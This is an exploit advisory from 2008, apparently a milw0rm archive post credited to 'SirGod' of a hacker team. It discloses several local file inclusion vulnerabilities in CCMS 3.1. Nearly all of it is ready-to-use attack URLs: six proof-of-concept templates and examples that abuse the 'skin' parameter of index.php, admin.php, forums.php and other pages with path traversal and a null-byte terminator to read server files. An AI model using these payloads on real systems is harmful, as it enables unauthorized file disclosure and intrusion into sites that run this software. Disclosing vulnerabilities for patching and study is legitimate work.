80 lines
No EOL
2.2 KiB
Text
80 lines
No EOL
2.2 KiB
Text
############################################################################################
|
|
[+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities
|
|
[+] Discovered By SirGod
|
|
[+] wWw.MorTal-TeaM.OrG
|
|
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
|
|
############################################################################################
|
|
|
|
[+] Download Script :
|
|
|
|
http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar
|
|
|
|
[+] Local File Inclusion
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
PoC 1 :
|
|
|
|
http://[target]/[path]/index.php?skin=[Local File]%00
|
|
|
|
Example 1 :
|
|
|
|
http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00
|
|
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
PoC 2 :
|
|
|
|
http://[target]/[path]/forums.php?skin=[Local File]%00
|
|
|
|
Example 2 :
|
|
|
|
http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00
|
|
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
PoC 3 :
|
|
|
|
http://[target]/[path]/admin.php?skin=[Local File]%00
|
|
|
|
Example 3 :
|
|
|
|
http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
PoC 4 :
|
|
|
|
http://[target]/[path]/header.php?skin=[Local File]%00
|
|
|
|
Example 4 :
|
|
|
|
http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
PoC 5 :
|
|
|
|
http://[target]/[path]/pages/story.php?skin=[Local File]%00
|
|
|
|
Example 5 :
|
|
|
|
http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
PoC 6 :
|
|
|
|
http://[target]/[path]/pages/poll.php?skin=[Local File]%00
|
|
|
|
Example 6 :
|
|
|
|
http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
############################################################################################
|
|
|
|
# milw0rm.com [2008-10-03] |